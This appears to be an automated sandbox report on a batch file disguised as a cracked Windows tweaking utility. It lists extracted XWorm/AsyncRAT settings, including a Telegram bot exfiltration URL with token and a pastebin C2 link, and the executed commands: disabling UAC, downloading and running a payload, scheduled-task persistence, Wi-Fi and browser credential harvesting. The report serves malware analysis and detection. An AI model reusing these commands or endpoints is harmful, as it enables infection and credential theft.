Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
16-10-2024 19:09
Static task
static1
Behavioral task
behavioral1
Sample
EXM_Premium_Tweaking_Utility_1.0_Cracked.bat
Resource
win11-20241007-en
General
-
Target
EXM_Premium_Tweaking_Utility_1.0_Cracked.bat
-
Size
672KB
-
MD5
f9ca73d63fe61c4c401528fb470ce08e
-
SHA1
584f69b507ddf33985673ee612e6099aff760fb1
-
SHA256
16431cc14917abeb316e0bc44045440a8f86b7ac4fdd0dce99de6435d493ecca
-
SHA512
6fd03320ec84baf09a16a127c2c0ed3c265906fcb1a3b807c13001e775c396b66539238392438a8f290be04b8b8684050736331f8f99dbe8b868b44f154dd9de
-
SSDEEP
3072:BIGzQbmbkAqA2xH7VkKEn14IZVvisLur+K3:BIGiVNEn14IZVvisL43
Malware Config
Extracted
xworm
-
Install_directory
%LocalAppData%
-
install_file
USB.exe
-
pastebin_url
https://pastebin.com/raw/ZnhxAV6a
-
telegram
https://api.telegram.org/bot7538644364:AAHEMV7mmxz6PSRgzo0ORf3_n0BaazmrAqk/sendMessage?chat_id=7541917888
Extracted
asyncrat
Default
127.0.0.1:6606
127.0.0.1:7707
127.0.0.1:8808
https://api.telegram.org/bot7538644364:AAHEMV7mmxz6PSRgzo0ORf3_n0BaazmrAqk/sendMessage?chat_id=7541917888
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x001c00000002ac1b-81.dat family_xworm behavioral1/memory/3176-132-0x00000000004E0000-0x000000000050A000-memory.dmp family_xworm -
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 2 IoCs
resource yara_rule behavioral1/files/0x001900000002ac1c-110.dat family_stormkitty behavioral1/memory/3884-137-0x0000000000C50000-0x0000000000C8E000-memory.dmp family_stormkitty -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Async RAT payload 1 IoCs
resource yara_rule behavioral1/files/0x001900000002ac1c-110.dat family_asyncrat -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk msedge.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk msedge.exe -
Executes dropped EXE 4 IoCs
pid Process 4672 EXMservice.exe 3176 msedge.exe 3884 svchost.exe 2280 msedge.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops desktop.ini file(s) 8 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\87a17d6aa5d0e6ff7002ece7f0875e91\Admin@OZYSBZXK_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Camera Roll\desktop.ini svchost.exe File created C:\Users\Admin\AppData\Local\87a17d6aa5d0e6ff7002ece7f0875e91\Admin@OZYSBZXK_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Saved Pictures\desktop.ini svchost.exe File created C:\Users\Admin\AppData\Local\87a17d6aa5d0e6ff7002ece7f0875e91\Admin@OZYSBZXK_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Local\87a17d6aa5d0e6ff7002ece7f0875e91\Admin@OZYSBZXK_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini svchost.exe File created C:\Users\Admin\AppData\Local\87a17d6aa5d0e6ff7002ece7f0875e91\Admin@OZYSBZXK_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Local\87a17d6aa5d0e6ff7002ece7f0875e91\Admin@OZYSBZXK_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini svchost.exe File created C:\Users\Admin\AppData\Local\87a17d6aa5d0e6ff7002ece7f0875e91\Admin@OZYSBZXK_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini svchost.exe File created C:\Users\Admin\AppData\Local\87a17d6aa5d0e6ff7002ece7f0875e91\Admin@OZYSBZXK_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini svchost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 51 pastebin.com 54 pastebin.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 51 icanhazip.com -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
pid Process 1000 powershell.exe 904 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 904 cmd.exe 3396 netsh.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier svchost.exe -
Modifies registry class 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix BackgroundTransferHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" BackgroundTransferHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" BackgroundTransferHost.exe Key created \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\MuiCache BackgroundTransferHost.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1476 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3176 msedge.exe -
Suspicious behavior: EnumeratesProcesses 28 IoCs
pid Process 1000 powershell.exe 1000 powershell.exe 904 powershell.exe 904 powershell.exe 3884 svchost.exe 3884 svchost.exe 3884 svchost.exe 3884 svchost.exe 3884 svchost.exe 3884 svchost.exe 3884 svchost.exe 3884 svchost.exe 3884 svchost.exe 3884 svchost.exe 3884 svchost.exe 3884 svchost.exe 3884 svchost.exe 3176 msedge.exe 3176 msedge.exe 3884 svchost.exe 3884 svchost.exe 3884 svchost.exe 3884 svchost.exe 3884 svchost.exe 3884 svchost.exe 3884 svchost.exe 3884 svchost.exe 3884 svchost.exe -
Suspicious use of AdjustPrivilegeToken 48 IoCs
description pid Process Token: SeDebugPrivilege 1000 powershell.exe Token: SeIncreaseQuotaPrivilege 3168 WMIC.exe Token: SeSecurityPrivilege 3168 WMIC.exe Token: SeTakeOwnershipPrivilege 3168 WMIC.exe Token: SeLoadDriverPrivilege 3168 WMIC.exe Token: SeSystemProfilePrivilege 3168 WMIC.exe Token: SeSystemtimePrivilege 3168 WMIC.exe Token: SeProfSingleProcessPrivilege 3168 WMIC.exe Token: SeIncBasePriorityPrivilege 3168 WMIC.exe Token: SeCreatePagefilePrivilege 3168 WMIC.exe Token: SeBackupPrivilege 3168 WMIC.exe Token: SeRestorePrivilege 3168 WMIC.exe Token: SeShutdownPrivilege 3168 WMIC.exe Token: SeDebugPrivilege 3168 WMIC.exe Token: SeSystemEnvironmentPrivilege 3168 WMIC.exe Token: SeRemoteShutdownPrivilege 3168 WMIC.exe Token: SeUndockPrivilege 3168 WMIC.exe Token: SeManageVolumePrivilege 3168 WMIC.exe Token: 33 3168 WMIC.exe Token: 34 3168 WMIC.exe Token: 35 3168 WMIC.exe Token: 36 3168 WMIC.exe Token: SeIncreaseQuotaPrivilege 3168 WMIC.exe Token: SeSecurityPrivilege 3168 WMIC.exe Token: SeTakeOwnershipPrivilege 3168 WMIC.exe Token: SeLoadDriverPrivilege 3168 WMIC.exe Token: SeSystemProfilePrivilege 3168 WMIC.exe Token: SeSystemtimePrivilege 3168 WMIC.exe Token: SeProfSingleProcessPrivilege 3168 WMIC.exe Token: SeIncBasePriorityPrivilege 3168 WMIC.exe Token: SeCreatePagefilePrivilege 3168 WMIC.exe Token: SeBackupPrivilege 3168 WMIC.exe Token: SeRestorePrivilege 3168 WMIC.exe Token: SeShutdownPrivilege 3168 WMIC.exe Token: SeDebugPrivilege 3168 WMIC.exe Token: SeSystemEnvironmentPrivilege 3168 WMIC.exe Token: SeRemoteShutdownPrivilege 3168 WMIC.exe Token: SeUndockPrivilege 3168 WMIC.exe Token: SeManageVolumePrivilege 3168 WMIC.exe Token: 33 3168 WMIC.exe Token: 34 3168 WMIC.exe Token: 35 3168 WMIC.exe Token: 36 3168 WMIC.exe Token: SeDebugPrivilege 904 powershell.exe Token: SeDebugPrivilege 3176 msedge.exe Token: SeDebugPrivilege 3884 svchost.exe Token: SeDebugPrivilege 3176 msedge.exe Token: SeDebugPrivilege 2280 msedge.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3176 msedge.exe -
Suspicious use of WriteProcessMemory 58 IoCs
description pid Process procid_target PID 3188 wrote to memory of 1404 3188 cmd.exe 81 PID 3188 wrote to memory of 1404 3188 cmd.exe 81 PID 3188 wrote to memory of 3172 3188 cmd.exe 82 PID 3188 wrote to memory of 3172 3188 cmd.exe 82 PID 3188 wrote to memory of 5068 3188 cmd.exe 83 PID 3188 wrote to memory of 5068 3188 cmd.exe 83 PID 3188 wrote to memory of 1000 3188 cmd.exe 84 PID 3188 wrote to memory of 1000 3188 cmd.exe 84 PID 3188 wrote to memory of 1964 3188 cmd.exe 88 PID 3188 wrote to memory of 1964 3188 cmd.exe 88 PID 3188 wrote to memory of 1120 3188 cmd.exe 89 PID 3188 wrote to memory of 1120 3188 cmd.exe 89 PID 3188 wrote to memory of 1432 3188 cmd.exe 90 PID 3188 wrote to memory of 1432 3188 cmd.exe 90 PID 1432 wrote to memory of 3168 1432 cmd.exe 91 PID 1432 wrote to memory of 3168 1432 cmd.exe 91 PID 1432 wrote to memory of 892 1432 cmd.exe 92 PID 1432 wrote to memory of 892 1432 cmd.exe 92 PID 3188 wrote to memory of 4836 3188 cmd.exe 93 PID 3188 wrote to memory of 4836 3188 cmd.exe 93 PID 3188 wrote to memory of 2204 3188 cmd.exe 107 PID 3188 wrote to memory of 2204 3188 cmd.exe 107 PID 3188 wrote to memory of 1868 3188 cmd.exe 108 PID 3188 wrote to memory of 1868 3188 cmd.exe 108 PID 3188 wrote to memory of 904 3188 cmd.exe 109 PID 3188 wrote to memory of 904 3188 cmd.exe 109 PID 3188 wrote to memory of 4672 3188 cmd.exe 110 PID 3188 wrote to memory of 4672 3188 cmd.exe 110 PID 4672 wrote to memory of 3176 4672 EXMservice.exe 111 PID 4672 wrote to memory of 3176 4672 EXMservice.exe 111 PID 4672 wrote to memory of 3884 4672 EXMservice.exe 112 PID 4672 wrote to memory of 3884 4672 EXMservice.exe 112 PID 4672 wrote to memory of 3884 4672 EXMservice.exe 112 PID 3188 wrote to memory of 3420 3188 cmd.exe 113 PID 3188 wrote to memory of 3420 3188 cmd.exe 113 PID 3176 wrote to memory of 1476 3176 msedge.exe 115 PID 3176 wrote to memory of 1476 3176 msedge.exe 115 PID 3884 wrote to memory of 904 3884 svchost.exe 117 PID 3884 wrote to memory of 904 3884 svchost.exe 117 PID 3884 wrote to memory of 904 3884 svchost.exe 117 PID 904 wrote to memory of 2768 904 cmd.exe 119 PID 904 wrote to memory of 2768 904 cmd.exe 119 PID 904 wrote to memory of 2768 904 cmd.exe 119 PID 904 wrote to memory of 3396 904 cmd.exe 120 PID 904 wrote to memory of 3396 904 cmd.exe 120 PID 904 wrote to memory of 3396 904 cmd.exe 120 PID 904 wrote to memory of 2416 904 cmd.exe 121 PID 904 wrote to memory of 2416 904 cmd.exe 121 PID 904 wrote to memory of 2416 904 cmd.exe 121 PID 3884 wrote to memory of 556 3884 svchost.exe 122 PID 3884 wrote to memory of 556 3884 svchost.exe 122 PID 3884 wrote to memory of 556 3884 svchost.exe 122 PID 556 wrote to memory of 2920 556 cmd.exe 124 PID 556 wrote to memory of 2920 556 cmd.exe 124 PID 556 wrote to memory of 2920 556 cmd.exe 124 PID 556 wrote to memory of 3588 556 cmd.exe 125 PID 556 wrote to memory of 3588 556 cmd.exe 125 PID 556 wrote to memory of 3588 556 cmd.exe 125 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\EXM_Premium_Tweaking_Utility_1.0_Cracked.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3188 -
C:\Windows\system32\reg.exeReg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SystemRestore" /v "RPSessionInterval" /f2⤵PID:1404
-
-
C:\Windows\system32\reg.exeReg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SystemRestore" /v "DisableConfig" /f2⤵PID:3172
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "SystemRestorePointCreationFrequency" /t REG_DWORD /d 0 /f2⤵PID:5068
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Unrestricted -NoProfile Enable-ComputerRestore -Drive 'C:\'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1000
-
-
C:\Windows\system32\reg.exeReg.exe ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "0" /f2⤵
- UAC bypass
PID:1964
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\CONSOLE" /v "VirtualTerminalLevel" /t REG_DWORD /d "1" /f2⤵PID:1120
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic path Win32_UserAccount where name="Admin" get sid | findstr "S-"2⤵
- Suspicious use of WriteProcessMemory
PID:1432 -
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_UserAccount where name="Admin" get sid3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3168
-
-
C:\Windows\system32\findstr.exefindstr "S-"3⤵PID:892
-
-
-
C:\Windows\system32\chcp.comchcp 650012⤵PID:4836
-
-
C:\Windows\system32\chcp.comchcp 4372⤵PID:2204
-
-
C:\Windows\system32\curl.execurl -g -k -L -# -o "C:\Users\Admin\AppData\Local\Temp\exm.zip" "https://github.com/anonyketa/EXM-Tweaking-Utility-Premium/releases/download/V1.0/exm.zip"2⤵PID:1868
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile Expand-Archive 'C:\Users\Admin\AppData\Local\Temp\exm.zip' -DestinationPath 'C:\Exm\'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:904
-
-
C:\exm\EXMservice.exeEXMservice.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4672 -
C:\Users\Admin\msedge.exe"C:\Users\Admin\msedge.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3176 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\Admin\AppData\Local\msedge.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:1476
-
-
-
C:\Users\Admin\svchost.exe"C:\Users\Admin\svchost.exe"3⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3884 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All4⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:904 -
C:\Windows\SysWOW64\chcp.comchcp 650015⤵
- System Location Discovery: System Language Discovery
PID:2768
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile5⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3396
-
-
C:\Windows\SysWOW64\findstr.exefindstr All5⤵
- System Location Discovery: System Language Discovery
PID:2416
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:556 -
C:\Windows\SysWOW64\chcp.comchcp 650015⤵
- System Location Discovery: System Language Discovery
PID:2920
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid5⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3588
-
-
-
-
-
C:\Windows\system32\chcp.comchcp 650012⤵PID:3420
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc1⤵PID:3744
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.131⤵
- Modifies registry class
PID:3100
-
C:\Users\Admin\AppData\Local\msedge.exeC:\Users\Admin\AppData\Local\msedge.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2280
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\87a17d6aa5d0e6ff7002ece7f0875e91\Admin@OZYSBZXK_en-US\Browsers\Firefox\Bookmarks.txt
Filesize105B
MD52e9d094dda5cdc3ce6519f75943a4ff4
SHA15d989b4ac8b699781681fe75ed9ef98191a5096c
SHA256c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142
SHA512d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7
-
C:\Users\Admin\AppData\Local\87a17d6aa5d0e6ff7002ece7f0875e91\Admin@OZYSBZXK_en-US\System\Process.txt
Filesize4KB
MD527d8714a3a8175bfc2c16ae941428559
SHA1a0da95712e0e9caaf6cac8e885b0ef4078071810
SHA256f0f3a25a1b51857c171f98e3c073cdd9a7cdee436423dfc98e5fb307e5d134a7
SHA5121379fdb4f35ae4720fde90c97b42c026bfd8e3f4e67202153f9b1b2688c6183f5f74fa20fc02e79bede1d550ee27ed2abb1c3bde2b44195d2d7def88f09a5117
-
Filesize
2KB
MD588dc70c361a22feac57b031dd9c1f02f
SHA1a9b4732260c2a323750022a73480f229ce25d46d
SHA25643244c0820ec5074e654ecd149fa744f51b2c1522e90285567713dae64b62f59
SHA51219c0532741ebc9751390e6c5ca593a81493652f25c74c8cab29a8b5b1f1efef8d511254a04f50b0c4a20724bae10d96d52af7a76b0c85ddc5f020d4cac41100c
-
Filesize
64B
MD51a11402783a8686e08f8fa987dd07bca
SHA1580df3865059f4e2d8be10644590317336d146ce
SHA2569b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0
SHA5125f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\BackgroundTransferApi\918001b7-1f04-41b0-a75b-da4beedce790.down_data
Filesize555KB
MD55683c0028832cae4ef93ca39c8ac5029
SHA1248755e4e1db552e0b6f8651b04ca6d1b31a86fb
SHA256855abd360d8a8d6974eba92b70cbd09ce519bc8773439993f9ab37cb6847309e
SHA512aba434bd29be191c823b02ea9b639beb10647bbe7759bbffdaa790dfb1ec2c58d74c525ef11aacda209e4effe322d1d3a07b115446c8914b07a3bce4d8a0e2c3
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
13.3MB
MD557a6527690625bea4e4f668e7db6b2aa
SHA1c5799fd94999d128203e81e22c6d9fdb86e167ee
SHA256076e01b09f9c5cccc273b2f7dfa1a1efccc1a8e8ebf98a7eee756024b93bad17
SHA512d86c7f79989eb0781e15f8631048506ffab338f933ddfedbcc2c7464447770beaf21b7ed3cba2ebb97be5ffdc9a450f2df2e2313efaeb8e8101f2ee53c066e4e
-
Filesize
5B
MD5e0f96ed59ac42c9e24434ab977bc8ae5
SHA10d3954ac1dcc56d75672701cd71434d6e749d59c
SHA2563274f94809103d85cfa3b4fee0b4e92523accd3ff6c02072c1beaeea149faf70
SHA512d4ed1aadcce817ebfd29d4d3f004f25413a09cd816240eb4f498a15cfdd0679e66df68d2c41470b774eab3529fb3337ce57311a05c323e8609ae076850d3e47b
-
Filesize
146KB
MD5f1c2525da4f545e783535c2875962c13
SHA192bf515741775fac22690efc0e400f6997eba735
SHA2569e6985fdb3bfa539f3d6d6fca9aaf18356c28a00604c4f961562c34fa9f11d0f
SHA51256308ac106caa84798925661406a25047df8d90e4b65b587b261010293587938fa922fbb2cfdedfe71139e16bfcf38e54bb31cbcc00cd244db15d756459b6133
-
Filesize
226KB
MD51bea6c3f126cf5446f134d0926705cee
SHA102c49933d0c2cc068402a93578d4768745490d58
SHA2561d69b5b87c4cd1251c5c94461a455659febb683eab0ebd97dd30da2319ffc638
SHA512eb9f423f6adb5e686a53f5f197e6b08455f8048d965a9ec850838fdf4724ef87f68945c435ace5a48a9a7226006a348e97586335d0246ea0dc898a412dea5df3
-
Filesize
12.0MB
MD5aab9c36b98e2aeff996b3b38db070527
SHA14c2910e1e9b643f16269a2e59e3ada80fa70e5fa
SHA256c148cc14f15b71a2d3f5e6bce6b706744f6b373a7e6c090c14f46f81d2d6e82f
SHA5120db75756a041a7cda6b384718581aaf11e6873614465dd56e81f17ad171cffe380e288a3c2ee540222190392904921f26df8a1d66d4108051c60fc8e5b2df779